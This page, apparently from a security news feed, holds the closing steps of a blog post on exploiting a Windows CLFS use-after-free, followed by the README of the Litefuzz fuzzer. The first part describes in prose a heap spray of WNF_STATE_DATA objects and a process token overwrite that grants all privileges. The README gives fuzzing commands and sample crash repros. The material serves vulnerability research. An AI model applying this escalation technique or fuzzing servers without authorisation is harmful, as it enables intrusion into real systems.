  8. Spray large number of WNF_STATE_DATA objects of size 0x700, each with unique data. This will first use up fragmented chunks in VS backend and then the entire freed segment in Step 7. Each page in the freed segment is now split as (0x700,0x700,0x1d0 (remaining)). Note, here size 0x700 can be used because the rest of the exploit doesn’t require any more freeing of the vulnerable chunk. This now creates 2 overlapping WNF_STATE_DATA objects, one of size 0x1000 (allocated in Step 6) and other of size 0x700 (allocated here). Size 0x700 is specifically chosen for 2 reasons. The first reason being that the additional chunk header (of size 0x10) in the 0x700-sized object means that the StateData header of the 0x1000-sized object is 0x10 bytes before the StateData header of the 0x700-sized object. Thus, the StateData header of the 0x700-sized object overlaps with the StateData data of the 0x1000-sized object.
  9. Update the StateData of the 0x1000-sized object to corrupt the StateData header of the 0x700-sized object such that the AllocatedSize and DataSize fields of the 0x700-sized object is increased from 0x6c0 (0x700-0x40) to 0x7000 each. Now, querying or updating the 0x700-sized object will result in an out-of-bounds read/write into adjacent 0x700-sized WNF_STATE_DATA objects allocated in Step 8.
  10. Identify the corrupted 0x700-sized WNF_STATE_DATA object by querying all of them with a Buffer size of 0x700. All will return successfully except for the corrupted one, which will return with an error indicating that the buffer size is too small. This is because the DataSize field was increased (refer to Step 9).
  11. Query the corrupted 0x700-sized WNF_STATE_DATA object (identified in Step 10) to further identify the next 2 adjacent WNF_STATE_DATA objects using the OOB read. The first of these will be at offset 0x710 and the second will be at offset 0x1000 from the corrupted 0x700-sized WNF_STATE_DATA object.
  12. Free the second newly identified WNF_STATE_DATA object of size 0x700.
  13. Create a new process, which will run with the same privileges as the exploit process. The token of this new process is allocated over the freed WNF_STATE_DATA object in Step 12. This is the second reason for choosing size 0x700, as the size of the token object is also 0x700.
  14. Query the corrupted 0x700-sized WNF_STATE_DATA object (identified in Step 10) to identify the contents of the token allocated in Step 13 using the OOB read. Calculate the offset to the Privileges.Enabled and Privileges.Present fields in the token*object.
  15. Update the corrupted 0x700-sized WNF_STATE_DATA object to corrupt the first adjacent object (identified in Step 11) using the OOB write. Increase the AllocatedSize and DataSize fields in the StateData pointer (refer to Step 9).
  16. Update the most recent corrupted WNF_STATE_DATA object (Step 15) to corrupt the adjacent token object using the OOB write. Overwrite the Privileges.Enabled and Privileges.Presentfields in the token object to 0xffffffffffffffff, thereby setting all the privileges. This completes the LPE.

Conclusion

We hope you enjoyed reading the deep dive into a use-after-free in CLFS, and if you did, go ahead and check out our other blog posts on vulnerability analysis and exploitation. If you haven’t already, make sure to follow us on Twitter to keep up to date with our work. Happy hacking!

The post Exploiting a use-after-free in Windows Common Logging File System (CLFS) appeared first on Exodus Intelligence.

Litefuzz - A Multi-Platform Fuzzer For Poking At Userland Binaries And Servers


Litefuzz is meant to serve a purpose: fuzz and triage on all the major platforms, support both CLI/GUI apps, network clients and servers in order to find security-related bugs. It simplifies the process and makes it easy to discover security bugs in many different targets, across platforms, while just making a few honest trade-offs.


It isn't built for speed, scalability or meant to win any prizes in academia. It applies simple techniques at various angles to yield results. For console-based file fuzzing, you should probably just use AFL. It has superior performance, instrumention capabilities (and faster non-instrumented execs), scale and can make freakin' jpegs out of thin air. For networking fuzzing, the mutiny fuzzer also works well if you have PCAPs to replay and frizzer looks promising as well. But if you want to give this one a try, it can fuzz those kinds of targets across platforms with just a single tool.

./ and give your target... a lite fuzz.

$ sudo apt install latex2rtf

$ ./litefuzz.py -l -c "latex2rtf FUZZ" -i input/tex -o crashes/latex2rtf -n 1000 -z
--========================--
--======| litefuzz |======--
--========================--

[STATS]
run id: 3516
cmdline: latex2rtf FUZZ
crash dir: crashes/latex2rtf
input dir: input/tex
inputs: 1
iterations: 1000
mutator: random(mutators)

@ 1000/1000 (3 crashes, 127 duplicates, ~0:00:00 remaining)

[RESULTS]
> completed (1000) iterations with (3) unique crashes and 127 dups
>> check crashes/latex2rtf for more details

This is a simple local target which AFL++ is perfectly capable of handling and just quickly given as an example. Litefuzz was designed to do much more in the way of network and GUI fuzzing which you'll see once you dive in.

why

Yes, another fuzzer and one that doesn't track all that well with the current trends and conventions. Trade-offs were made to address certain requirements. These requirements being a fuzzer that works by default on multiple platforms, fuzzes both local and network targets and is very easy to use. Not trying to convince anybody of anything, but let's provide some context. Some targets require a lot of effort to integrate fuzzers such as AFL into the build chain. This is not a problem as this fuzzer does not require instrumentation, sacraficing the precise coverage gained by instrumentation for ease and portability. AFL also doesn't support network fuzzing out of the box, and while there are projects based on it that do, they are far from straightforward to use and usually require more code modifications and harnesses to work (similar story with Libfuzzer). It doesn't do parallel fuzzing, nor support anything like the blazing speed improvments that persistent mode can provide, so it cannot scale anywhere close to what fuzzers with such capabilities. Again, this is not a state-of-the-art fuzzer. But it doesn't require source code, properly up a build or certain OS features. It can even fuzz some network client GUIs and interactive apps. It lives off the land in a lot of ways and many of the features such as mutators and minimization were just written from scratch.

It was designed to "just work" and effort has been put into automating the setup and installation for the few dependencies it needs. This fuzzer was written to serve a purpose, to provide value in a lot of different target scenarios and environments and most importantly and for what all fuzzers should ultimately be judged on: the ability to find bugs. And it does find bugs. It doesn't presume there is target source code, so it can cover closed source software fairly well. It can run as part of automation with little modification, but is geared towards being fun to use for vulnerability researchers. It is however more helpful to think of it as a R&D project rather than a fully-fledged product. Also, there's no complicated setup w here it's slightly broken out of the box or needs more work to get it running on modern operating systems. It's been tested working on Ubuntu Linux 20.04, Mac OS 11 and Windows 10 and comes with fully functional scripts that do just about everything for you in order to setup a ready-to-fuzz environment.

Once the setup script completes, it only takes a few minutes to get started fuzzing a ton of different targets.

how it works

Litefuzz supports three different modes: local, client and server. Local means targeting local binaries, which on Linux/Mac are launched via subprocess with automatic GDB and LLDB triage support respectively on crashes and via WinAppDbg on Windows. Crashes are written to a local crash directory and sorted by fault type, such as read/write AVs or SIGABRT/SIGSEGV along with the file hashes. All unique crashes are triaged as it fuzzes and this data along with target output (as available) is also captured and placed as artifacts in the same directory. It's also possible to replay crashes with --replay and providing the crashing file. In local client mode, the input directory should contain a server greeting, response or otherwise data that a client would expect when connecting to a server. As of now only one "shot" is implementated for network fuz zing with no complex session support. The client is launched via command line and debugged the same as when file fuzzing. A listener is setup to support this scenario, yes its a slow and borderline manual labor but it works. If a crash is detected, it is replayed in gdb to get the triage details. In remote client mode, this works the same expect for no local debugging / crash triage. In local server mode, it's similar to local client mode and for remote server mode it just connects to a specified target and send mutated sample client data that the user specifies as inputs, but only a simple "can we still connect, if not then it probably crashed on the last one" triage is provided.

There are a few mutation functions written from scratch which mostly do random mutations with a random selection of inputs specified by the -i flag. For file fuzzing, just select local mode and pass it the target command line with FUZZ denoting where the app expects the filename to parse, eg. tcpdump -r FUZZ along with an input directory of "good files" to mutate. For network client fuzzing, it's similar to local fuzzing, but also provide connection specifics via -a. And if you want to fuzz servers, do server mode and provide a protocol://address:port just like for clients.

It fuzzes as fast as the target can consume the data and exit, such as the case for most CLI applications or for as long as you've determined it needs before the local execution or network connection times out, which can be much slower. No fancy exec or kernel tricks here. But of course if you write a harness that parses input and exits quickly, covering a specific part of the target, that helps too. But at that point, if you can get that close to the target, you're probably better off using persistant mode or similar features that other fuzzers can offer.

In short...

what it does

  • runs on linux, windows and mac and supports py2/py3
  • fuzzes CLI/GUI binaries that read from files/stdin
  • fuzzes network clients and servers, open source or proprietary, available to debug locally or remote
  • diffs, minimization, replay, sorting and auto-triaging of crashes
  • misc stuff like TLS support, golang binary fuzzing and some extras for Mac
  • mutates input with various built-in mutators + pyradamsa (Linux)

what it doesn't do

  • native instrumentation
  • scale with concurrent jobs
  • complex session fuzzing
  • remote client and server monitoring (only basic checks eg. connect)

support

Primarily tested on Ubuntu Linux 20.04 (lightly tested on 21.04), Windows 10 and Mac OS 11. The fuzzer and setup scripts may work on slightly older or newer versions of these operating systems as well, but the majority of research, testing and development occurred in these environments. Python3 is supported and an effort was made to make the code compatiable with Python2 as well as it's necessary for fuzzing on Windows via WinAppDbg. Platform testing primarily occured on Intel-based hardware, but things seem to mostly work on Apple's M1 platform too (notable exceptions being on Linux the exploitable plugin for GDB probably isn't supported, nor is Pyradamsa). There are also setup scripts in setup/ to automate most or all of the tasks and depencency installation. It can generally fuzz native binaries on each platform, wh ich are often compiled in C/C++, but it also catch crashes for Golang binaries as well (experimental).

python versions

Python3 is supported for Linux and Mac while Python2 is required for Windows.

Why Py3 for Linux and Mac? Pyautogui, Pyradamsa (Linux only), better socket support on Mac.

Why Py2 for Windows? Winappdbg requires Py2.

linux

GDB for debugging and exploitable for crash triage. If it's OSS, you can build and instrument the target with sanitizers and such, otherwise there's some memory debuggers we can just load at runtime.

This installation along with the python dependencies and other helpful stuff has been automated with setup/linux.sh. Recommended OS is Ubuntu 20.04 as that is where the majority of testing occurred.

mac

Instead of gdb, we use lldb for debugging on OS X as it's included with the XCode command line tools. Being an admin or in the developer group should let you use lldb, but this behavior may differ across environments and versions and you may need to run it with sudo privileges if all else fails.

The one thing you'll manually need to do is turn off SIP (in recovery, via cmd+R or use vmware fusion hacks). Otherwise, auto-triage will fail when fuzzing on Tim Apple's OS.

Almost all of the setup has been automated with the setup/mac.sh script, so you can just run it for a quick start.

windows

WinAppDbg is used for debugging on Windows with the slight caveat that stdin fuzzing isn't supported.

Like the automated setups for the other operating systems, chocolatey helps to automate package installation on windows. Run setup/windows.bat in the litefuzz root directory as Administrator to automate the installations. It will install debugging tools and other dependencies to make things run smoothly.

targets

This is a list of the types of targets that have been tested and are generally supported.

  • Local CLI/GUI apps that parse file formats or stdin

    • debug support
  • Local CLI/GUI network client that parses server responses

    • debug support for CLIs
    • limited debug support for GUIs
  • Local CLI network server that parses client requests

    • debug support (caveat: must able to run as a standalone executable, otherwise can be treated as remote)
  • Local GUI network server that parses client requests

    • theoretically supported, untested
  • Remote CLI/GUI network client that parses server responses

    • no debug support
  • Remote CLI/GUI network server that parses client requests

    • no debug support
    • exception being on Mac and using attach or reportcrash features

Again, the fuzzer can run on and support local apps, clients and servers on Linux, Mac and Windows and of course can fuzz remote stuff independent of the target platform.

triage

  • Local CLI/GUI apps that parse file formats or stdin

    • run app, catch signals, repro by running it again inside a debugger with the crasher
  • Local CLI/GUI network client that parses server responses

    • run app, catch signals, repro by running it again inside a debugger with the crasher
  • Local GUI/CLI network server that parses client requests

    • run app in debugger, catch signals, repro by running it again inside a debugger with the crasher
  • Remote CLI/GUI network client that parses server responses

    • no visiblity, collect crashes from the remote side
    • can manually write supporting scripts to aid in triage
  • Remote CLI/GUI network server that parses client requests

    • no visiblity, collect crashes from the remote side
    • can manually write supporting scripts to aid in triage
    • exception on Mac are the attach and reportcrash options, which can be used to enable some triage capabilities

getting started

Most of the setup across platforms has been automated with the scripts in the setup directory. Simply run those from the litefuzz root and it should save you a lot of time and help enable some of what's needed for automated deployments. It's useful to use a VM to setup a clean OS and fuzzing environment as among other things its snapshot capabilities come in handy.

See INSTALL.md for details.

tests

unit tests

There are a few simple unit and functional tests to get some coverage for Litefuzz, but it is not meant to be complete.

py2> pytest
py3> python3 -m pytest

This will run pytest for test_litefuzz.py in the main directory and provide PASS/FAIL results once the test run is finished.

crashing app tests

A few examples of buggy apps for testing crash and triage capabilities on the different platforms can be found in the test folder.

  • (a) null pointer dereference
  • (b) divide-by-zero
  • (c) heap overflow
  • (d-gui) format string bug in a GUI
  • (e) buffer overflow in client
  • (f) buffer overflow in server

They are automatically built during setup and you can run them on the command line, in a debugger or use them to test as fuzzing targets. If running on Windows command line, check Event Viewer -> Windows Logs -> Application to see crashes.

options

There are a ton of different options and features to take advantage of various target scenarios. The following is a brief explanation and some examples to help understand how to use them.

crash directory

-o lets you specify a crash directory other than the default, which is the crashes/ in the local path. One can use this to manage crash folders for several concurrent fuzzing runs for different apps at the same time.

insulate mode

-u insulates the target application from the normal fuzzing process, eg. execs or sending packets over and over and checking for crashes. Instead, this mode was made for interactive client applications, eg. Postman where you can script inside the application to repeat connections for client fuzzing. The target is ran inside of a debugger, the fuzzer is paused to get the user time to click a few buttons or sets the target's config to make it run automatically, user resumes and now you are fuzzing interactive network clients.

litefuzz -lk -c "/snap/postman/140/usr/share/Postman/_Postman" -i input/http_responses -a tcp://localhost:8080 -u -n 100000 -z

Insulate mode + refresh can be used for interactive clients, eg. run FileZilla in a debugger, but keep hitting F5 to make it reconnect to the server for each new iteration. Also, fuzzing local CLI/GUI servers are only started and ran once inside a debugger to make the process a little more efficient.

--key also allows you to send keys while fuzzing interactive targets, such as fuzzing FileZilla's parsing of FTP server responses by sending "refresh connection" with F5.

litefuzz -lk -c "filezilla" -a tcp://localhost:2121 -i input/ftp/filezilla -u -pp --key "F5" -n 100 -z glibc

note: insulate mode has only been tested working on Linux and is not supported on Windows.

timeout

-x secs allows you to specify a timeout. In practice, this is more like "approx how long between iterations" for CLI targets and an actual timeout for GUIs.

mutators

--mutator N specifies which mutator to use for fuzzing. If the option is not provided, a random choice from the list of available mutators is chosen for each fuzzing iteration. These mutators were written from scratch (with the exception of Radamsa of course). And while they have been extensively tested and have held up pretty well during millions of iterations, they may have subtle bugs from time to time, but generally this should not affect functionality.

FLIP_MUTATOR = 1
HIGHLOW_MUTATOR = 2
INSERT_MUTATOR = 3
REMOVE_MUTATOR = 4
CARVE_MUTATOR = 5
OVERWRITE_MUTATOR = 6
RADAMSA_MUTATOR = 7

note: Radamsa mutator is only available on Linux (+ Py3).

ReportCrash

--reportcrash is mac-specific. Instead of using the default triage system, it instructs the fuzzer to monitor the ReportCrash directory for crash logs for the target process. ReportCrash must be enabled on OS X (default enabled, but usually disabled for normal fuzzing). This feature is useful in scenarios where we can't run the target in a debugger to generate and triage our own crash logs, but we can utilize this core functionality on the operating system to gain visibility.

note: consider this feature experimental as we're relying on a few moving parts and components we don't directly control within the core MacOS system. ReportCrash may eventually stop working properly and responding after fuzzing for a while even after attempting to unload and reload it, so one can try rebooting the machine or resetting the snapshot to get it back in good shape.

sudo launchctl unload -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist
sudo launchctl load -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist

pause

Hit ctrl+c to pause the fuzzing process. If you want to resume, choose y or n to stop. This feature works ok across platforms, but may be less reliable when fuzzing GUI apps.

reusing crashes for variant finding

-e enables reuse mode. This means that if any crashes were found during the fuzzing run, they will be used as inputs for a second round of fuzzing which can help shake out even more bugs. Combine with -z for -ez bugs! Da-duph.

The following example is fuzzing antiword with 100000 iterations and then start another run with the same iteration count and options to reuse the crashes as input to try and grind out even more bugs.

litefuzz -l -c "antiword FUZZ" -i docs -n 100000 -ez

(or one could manually copy over crashes to an input directory to directly control the interations for the reuse run)

litefuzz -l -c "antiword FUZZ" -i docs-crashes -n 500000 -z

note: this mode is supported for local apps only.

memory debugging helpers

-z enables Electric Fence (or glib malloc debugging as fallback) on Linux, Guard Malloc on Mac and PageHeap on Windows. Also, -zz can be used to disable PageHeap after enabling it for an application. If you want to just flip it on/off without starting the fuzzer, just leave out the -i flag. During Windows setup, gsudo is installed and can be used to run elevated commands on the command line, such as turning on PageHeap for targets.

sudo litefuzz -l -c "notepad FUZZ" -i texts/files -z

sudo litefuzz -l -c "notepad FUZZ" -zz

On Linux, specific helpers can be chosen. For example, instead of just using glib malloc as a fallback, it can be selected.

litefuzz -l -c "geany FUZZ" -i texts/codes -z glibc

The default Electric Fence malloc debugger is great, but it doesn't work with all targets. You can test the target with EF and if it crashes, select the glibc helper instead.

checking live target output

If fuzzing local apps on Linux or Mac, you can cat /tmp/litefuzz/RUN_ID/fuzz.out to check what the latest stdout was from the target. RUN_ID is shown in the STATS information area when fuzzing begins. In the event that a crash occurs, stdout is also captured in the crashes directory as the .out file. Global stdout/stderr also goes to /tmp/litefuzz/out for debugging purposes as well for all fuzzing targets with the exception of insulated or local server modes which debugger output goes to /tmp/litefuzz/RUN_ID/out. Winappdbg doesn't natively support capturing stdout of targets (AFAIK), so this artifact is not available on Windows.

client and server modes

If the server can be ran locally simply by executing the binary (with or without some flags and configuration), you can pass it's command line with -c and it will be started, fuzzed and killed with a new execution every iteration. The idea here is trading speed for the ability avoid those annoying bugs which triggered only after the target's memory is in a "certain state", which can lead to false positives. Same deal with locally fuzzing network clients. It even supports TLS connections, generating certificates for you on the fly (allowing the user to provide a client cert when fuzzing a server that requires it and certificate fuzzing itself are other ideas here). Debugging support is not provided by Litefuzz when fuzzing remote clients and servers, so setup on that remote end is up to the user. For servers, we simply check if the server stopped responding and note the previous payload as the crasher. This works fine for TCP connections, but we don't quite have this luxury for UDP services, so monitoring the remote server is left up to either the ReportCrash feature (available on Mac), running the target in a debugger (via local server mode or manually) or crafting custom supporting scripts. Also, some servers may auto-restart or otherwise recover after crashing, but there may be signs of this in the logs or other artifacts on the filesystem which can parsed by supporting scripts written for a particular target.

local network examples

litefuzz -lk -c "wget http://localhost:8080" -a tcp://localhost:8080 -i input/http -z

litefuzz -lk -c "curl -k https://localhost:8080" -a tcp://localhost:8080 -i input/http -z

litefuzz -lk -c "curl -k https://localhost:8080" -a tcp://localhost:8080 -i input/http -o crashes/curl --tls -n 100000 -z

(open Wireshark and capture the response from a d, right click Simple Network Management Protocol -> Export Packet Bytes -> resp.bin)

litefuzz -lk -c "snmpwalk -v 2c -c public localhost:1616 1.3.6.1.2.1.1.1" -a udp://localhost:1616 -i input/snmp/resp.bin -n 1 -d -x 3

litefuzz -ls -c "./sc_serv shoutcast.conf" -a localhost:8000 -i input/shouts -z

litefuzz -ls -c "snmpd" -i input/snmp -a udp://localhost:161 -z

quick notes

  • UDP sockets can act a little strange on Mac + Py2, so only Mac + Py3 has been tested and supported
  • Local network client fuzzing on Windows can be buggy and should be considered experimental at this time

remote network examples

Fuzzing remote clients and servers is a bit more challenging: we have no local debugging and rely on catching a halt in interaction between the two parties over the network to catch crashes. Also, since we are assumedly blind to what's happening on the other end, fuzzing ends when the client or server stops responding and needs to be restarted manually after the client or server is restored to a normal (uncrashed) state unless the user has setup scripts on the remote side to manage this process. Again, UDP complicates this further. Even sending a test packet to see if there's a listening service on a UDP port doesn't guarantee a reply. So it's possible to remotely fuzz network clients and servers, but there's a trade-off on visibility.

client

while :; do echo "user test\rpass test\rls\rbye\r" | ftp localhost 2121; sleep 1; done

litefuzz -k -i input/ftp/test -a tcp://localhost:2121 -pp -n 100

Client mode is more finicky here because it's hard to tell whether a client has actually crashed so it's not reconnecting or if the send/recv dance is just off as different clients can handle connections however they like. Also note that this just an example and that remote client fuzzing by nature is tricky and should be considered somewhat experimental.

server

The pros and cons of fuzzing a server locally or remotely can help you make a decision of how to approach a target when both options are available. Basically, fuzzing with the server in a debugger is going to be slower but you'll be able to get crash logs with the automatic triage, whereas fuzzing the server in remote mode (even pointing it to the localhost) will be much faster on average, but you lose the high visibility, debugger-based triage capabilities but it will give you time to manually restart the server after each crash to keep going before it exits (TCP servers only, feature does not support UDP-based servers).

Shoutcast

./sc_serv ...

litefuzz -s -a localhost:8000 -i input/shouts -n 10000

SSHesame

sshesame

litefuzz -s -a tcp://target:2022 -i input/ssh-server -p -n 1000000 -x 0.05

FTP

litefuzz -s -a tcp://target:21 -i input/ftp/req.txt -pp -n 1000

DNS

coredns -dns.port 10000

litefuzz -ls -c "coredns -dns.port 10000" -a udp://localhost:10000 -i dns-req/1.bin -o crashes/coredns -n 10000

or

litefuzz -s -a udp://localhost:10000 -i dns-req/1.bin -o crashes/coredns -n 10000

TLS

litefuzz -s -a tcp://hostname:8080 -i input/http --tls -n 10000

...
@ 48/10000 (1 crashes, 0 duplicates, ~7:13:18 remaining)

[!] check target, sleeping for 60 seconds before attempting to continue fuzzing...

note: default remote server mode delays between fuzzing iterations can make fuzzing sessions run reliably, but are pretty slow; this is the safe default, but one can use -x to set very fast timeouts between sessions (as shown above) if the target is OK parsing packets very quickly, unoffically nicknamed "2fast2furious" mode

For more on session-based protocols (such as FTP or SSH), see Multiple modes.

multiple data exchange modes

-p is for multiple binary data mode, which allows one to supply sequential inputs, eg. input/ssh directory containing files named "1", "2", "3", etc for each packet in the session to fuzz. This is meant to enable fuzzing of binary-based protocol implementations, such as SSH client.

ls input/ssh 1 2 3 4

xxd input/ssh/2 | head

00000000: 0000 041c 0a14 56ff 1297 dcf4 672d d5c9  ......V.....g-..
00000010: d0ab a781 dfcb 0000 00e6 6375 7276 6532 ..........curve2
00000020: 3535 3139 2d73 6861 3235 362c 6375 7276 5519-sha256,curv
00000030: 6532 3535 3139 2d73 6861 3235 3640 6c69 e25519-sha256@li
00000040: 6273 7368 2e6f 7267 2c65 6364 682d 7368 bssh.org,ecdh-sh
00000050: 6132 2d6e 6973 7470 3235 362c 6563 6468 a2-nistp256,ecdh
00000060: 2d73 6861 322d 6e69 7374 7033 3834 2c65 -sha2-nistp384,e
00000070: 6364 682d 7368 6132 2d6e 6973 7470 3532 cdh-sha2-nistp52
00000080: 312c 6469 6666 6965 2d68 656c 6c6d 616e 1,diffie-hellman
00000090: 2d67 726f 7570 2d65 7863 6861 6e67 652d -group-exchange-

Each packet is consumed into an array, a random index is mutated and replayed to fuzz the target.

litefuzz -lk -c "ssh -T test@localhost -p 2222" -a tcp://localhost:2222 -i input/ssh -o crashes/ssh -p -n 250000 -z glibc

And you can check on the target's output for the latest iteration.

authentication code incorrect">
cat /tmp/litefuzz/out
kex_input_kexinit: discard proposal: string is too large
ssh_dispatch_run_fatal: Connection to 127.0.0.1 port 2222: string is too large

... and others like

ssh_dispatch_run_fatal: Connection to 127.0.0.1 port 2222: unknown or unsupported key type

ssh_askpass: exec(/usr/bin/ssh-askpass): No such file or directory
Host key verification failed.

Bad packet length 1869636974.
ssh_dispatch_run_fatal: Connection to 127.0.0.1 port 2222: message authentication code incorrect

-pp asks the fuzzer to check inputs for line breaks and if detected, treat those as multiple requests / responses. This is useful for simple network protocol fuzzing for mostly string-based protocol implementations, eg. ftp clients.

cat input/ftp/test
220 ProFTPD Server (Debian) [::ffff:localhost]
331 Password required for user
230 User user logged in
215 UNIX Type: L8
221 Goodbye

The fuzzer breaks each line into it's own FTP response to try and fuzz a client's handling of a session. There's no guarentee, however, that a client will "behave" or act in ways that don't allow a session to complete properly, so some trial and error + fine tuning for session test cases while running Wireshark can be helpful for understanding the differences in interaction between targets.

litefuzz -lk -c "ftp localhost 2121" -a tcp://localhost:2121 -i input/ftp -o crashes/ftp -n 100000 -pp -z

This can also be combined with -u for insulating GUI network targets like FileZilla.

litefuzz -lk -c "filezilla" -a tcp://localhost:2121 -i input/ftp.resp -n 100000 -u -pp -z glibc

attaching to a process

If the target spawns a new process on connection, one can specify the name of a process (or pid) to attach to after a connection has been established to the server. This is handy in cases where eg. launchd is listening on a port and only launches the handling process once a client is connected. This is one feature that sort of blurs the line between local and remote fuzzing, as technically the fuzzer is in remote mode, yet we specify the target address as localhost and ask it to attach to a process.

./litefuzz.py -s -a tcp://localhost:8080 -i input/shareserv -p --attach ShareServ -x 1 -n 100000

note: currently this feature is only supported on Mac (LLDB) and for network fuzzing, although if implemented it should work fine for Linux (GDB) too.

crash artifacts

When a crash is encountered during fuzzing, it is replayed in a debugger to produce debug artifacts and bucketing information. The information varies from platform to platform, but generally the a text file is produced with a backtrace, register information, !exploitable type stuff (where available) and other basic information.

Memory dumps can be enabled on Windows by passing the --memdump or disabled with --nomemdump similar to how malloc debuggers are controlled via -z and -zz respectively. If enabled, the dump will also be loaded in the console debugger (cdbg) and !analyze -v crash analysis output is captured within an additional memory dump crash analysis log. Winappdbg already has !exploitable type analysis that we get in the initial crash analysis, so we just do !analyze here.

litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --memdump

or to disable memory dumps for an application

litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --nomemdump

In addition to auto-crash triage, binary/string diffs (as appropriate) and target stdout (platform / target dependent) is also produced and repro files of course.

For local fuzzing, artifacts generally include diffs, stdout (linux/mac only), repro file and the crash log and information file.

$ ls crashes/latex
PROBABLY_EXPLOITABLE_SIGSEGV_XXXX5556XXXX_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.diff
PROBABLY_EXPLOITABLE_SIGSEGV_XXXX5556XXXX_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.diffs
PROBABLY_EXPLOITABLE_SIGSEGV_XXXX5556XXXX_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.out
PROBABLY_EXPLOITABLE_SIGSEGV_XXXX5556XXXX_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.tex
PROBABLY_EXPLOITABLE_SIGSEGV_XXXX5556XXXX_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.txt

On Windows, if memory dumps are enabled, a dump file will be generated and additional triage information will be written to an additional crash analysis log.

C:\litefuzz\crashes> dir
app.exe.14299_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.dmp
app.exe.14299_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.log
....

For remote fuzzing, artifacts may vary depending on the options chosen, but often include diffs, repro file and/or repro file directory (if input is a session with multiple packets), previous fuzzing iteration repro (prevent losing a bug in case its actually the crasher as remote fuzzing has its challenges) and crash log or brief information file.

ls crashes/serverd
REMOTE_SERVER_testbox.1_NNNN_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY
REMOTE_SERVER_testbox.1_NNNN_PREV_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY
UNKNOWN_XXXX2040YYYY_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY.diff
UNKNOWN_XXXX2040YYYY_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY.diffs
UNKNOWN_XXXX2040YYYY_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY.txt
UNKNOWN_XXXX2040YYYY_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY.zz

ls crashes/serverd/REMOTE_SERVER_localhost_NNNN_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY
REMOTE_SERVER_testbox.1_NNNN_1.zz REMOTE_SERVER_localhost_NNNN_2.zz
REMOTE_SERVER_testbox.1_NNNN_3.zz REMOTE_SERVER_localhost_NNNN_4.zz

golang

Apparently when Golang binaries crash, they may not actually go down with a traditional SIGSEGV, even if that's what they say in the panic info (Linux tested). They may instead crash with return code 2. So I guess that's what we're going with :) I'm sure there's a better explanation out there for how this works and edge cases around it, but one can use --golang to try and catch crashes in golang binaries on Linux.

litefuzz -l -c "evernote2md FUZZ" -i input/enex -o crashes/evernote2md --golang -n 100000

repros

Crashing files are kept in the crashes/ directory (or otherwise specified by -o flag) along with diffs and crash info.

-r and passing a repro file (or directory) with the appropriate target command line / address setup will try and reproduce the crash locally or remote.

local example

litefuzz -l -c "latex2rtf FUZZ" -r crashes/latex2rtf/test.tex -z

local network example

./litefuzz -ls -c "./sc_serv shoutcast.conf" -a tcp://localhost:8000 -r crashes/crash.raw

remote network example

litefuzz -s -a tcp://host:8000 -r crashes/crash.raw

remote network example (multiple packets)

litefuzz -s -a tcp://localhost:22 -r repro/dir/here

remove file

Some targets ask for a static outfile location as part of their command line and may throw an error if that file already exists. --rmfile is an option for getting around this while fuzzing where after each fuzzing iteration, it will remove the file that was generated as a part of how the target functions.

litefuzz -l -c "hdiutil makehybrid -o /tmp/test.iso -joliet -iso FUZZ" -i input/dmg --rmfile /tmp/test.iso -n 500000 -ez

minimization

Minimizing crashing files is an interesting activity. You can even infer how a target is parsing data by comparing a repro with a minimized version.

-m and passing a repro file with the target command line or address setup will attempt to generate a minimized version of the repro which still crashes the target, but smaller and without bytes that may not be necessary. During this minimization journey, it may even find new crashes. Only local modes are supported, but this still includes local client and server modes, so you can minimize network crashes as long as we can debug them locally.

For example, this request is the original repro file.

GET /admin.cgi?pass=changeme&mode=debug&option=donotcrash HTTP/1.1
Host: localhost:8000
Connection: keep-alive
Authorization: Basic YWRtaW46Y2hhbmdlbWU=
Referer: http://localhost:8000/admin.cgi?mode=debug

Now take a look at it's minimized version.

GET /admin.cgi?mode=debug&option=a
Authorization:s YWRtaW46Y2hhbmdlbWU
Referer:admin.cgi

One can make some guesses about what the target is looking for and even the root cause of the crash.

  1. The request is most important part
  2. option= can probably be a lot of different things
  3. The Host and Connection headers aren't neccesary
  4. Authorization header parsing is just looking for the second token and doesn't care if it's explicitly presenting Basic auth
  5. Referer is necessary, but only admin.cgi and not the host or URL

Anything else? Here's a bonus: passing a valid password isn't needed if the Authorization creds are correct, and visa-versa. Since the minimization is linear and starts at the beginning of the file and goes until it hits the end, we'd only produce a repro which authenticates this way, while still discovering there are actually two options!

-mm enables supermin mode. This is slower, but it will try and minimize over and over again until there's no more unnecessary bytes to remove.

For fun, we can modify the repro and run it through supermin to get the maximally minimized version.

GET /admin.cgi?pass=changeme&mode=debug&option=a
Referer:admin.cgi

minimization examples

litefuzz -l -c "latex2rtf FUZZ" -m test.tex -z

litefuzz -ls -c "./sc_serv shoutcast.conf" -a "tcp://localhost:8000" -m repro.http

supermin example

litefuzz -l -c "latex2rtf FUZZ" -mm crashes/latex2rtf/test.tex -z
...
[+] starting minimization

@ 582/582 (1 new crashes, 1145 -> 582 bytes, ~0:00:00 remaining)

[+] reduced crash @ pc=55555556c141 -> pc=55555557c57d to 582 bytes

[+] supermin activated, continuing...

@ 299/299 (1 new crashes, 582 -> 300 bytes, ~0:00:00 remaining)

[+] reduced crash @ pc=55555557c57d to 300 bytes
...
